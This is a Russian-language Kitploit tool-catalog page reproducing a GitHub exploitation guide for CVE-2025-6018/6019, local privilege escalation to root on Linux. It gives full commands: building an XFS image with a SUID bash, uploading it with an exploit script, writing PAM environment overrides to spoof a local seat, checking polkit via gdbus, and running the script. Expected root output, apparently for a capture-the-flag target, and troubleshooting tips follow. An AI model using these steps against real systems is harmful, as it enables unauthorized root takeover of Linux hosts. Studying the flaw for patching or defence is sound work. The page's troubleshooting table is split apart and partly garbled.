Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-6018 — Руководство по эксплуатации уязвимостей CVE-2025-6018/6019 для повышения привилегий через манипуляцию образами XFS и злоупотребление переменными окружения PAM с целью получения доступа root на системах Linux. | Kitploit
Инструменты/GitHubGitHub/e1arth/cve-2025-6018
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed TeamingЭксплуатация Бинарных Файлов
GitHube1arth/cve-2025-6018

CVE-2025-6018

Руководство по эксплуатации уязвимостей CVE-2025-6018/6019 для повышения привилегий через манипуляцию образами XFS и злоупотребление переменными окружения PAM с целью получения доступа root на системах Linux.

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-6018 + CVE-2025-6019 Руководство по повышению привилегий

中文

📋 Краткие шаги эксплуатации

Шаг 1: Подготовка образа XFS (локальная машина)

root@kitploit:~
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# Verify (should show 300M)
ls -lh xfs.image

Шаг 2: Загрузка файлов на цель

root@kitploit:~
# Upload exploit script and image
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

Шаг 3: Первый вход — настройка PAM

root@kitploit:~
# SSH login to target
ssh [email protected]

# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Verify configuration
cat ~/.pam_environment

# 🔥 Critical: Logout (to activate PAM config)
exit

Шаг 4: Второй вход — выполнение повышения привилегий

root@kitploit:~
# Re-login via SSH (PAM config now active)
ssh [email protected]

# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# Execute privilege escalation script
bash exp.sh

✅ Признаки успеха

При успешной эксплуатации вы должны увидеть:

root@kitploit:~
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!

════════════════════════════════════════════════════════════
║ ROOT FLAG                                               ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 Устранение неполадок

ПроблемаРешение
CanReboot возвращает ('no',)

📌 Ключевые моменты

  • ✅ Обязательно выйти и войти снова: конфигурация PAM действует только в новых сеансах
  • ✅ Проверьте CanReboot: убедитесь, что возвращается ('yes',) перед запуском скрипта
  • ✅ Используйте SSH-вход: не используйте конструкцию ssh -t user@host "cmd"

🐱 Хранитель-кот

Если что-то не работает, убедитесь, что каждый шаг выполнен строго по порядку!

Скачать инструмент
Убедитесь, что вы вышли и вошли снова (Шаг 3)
Ошибка Not authorizedПроверьте правильность содержимого ~/.pam_environment
SUID bash не найденПерезагрузите xfs.image и проверьте установку SUID-бита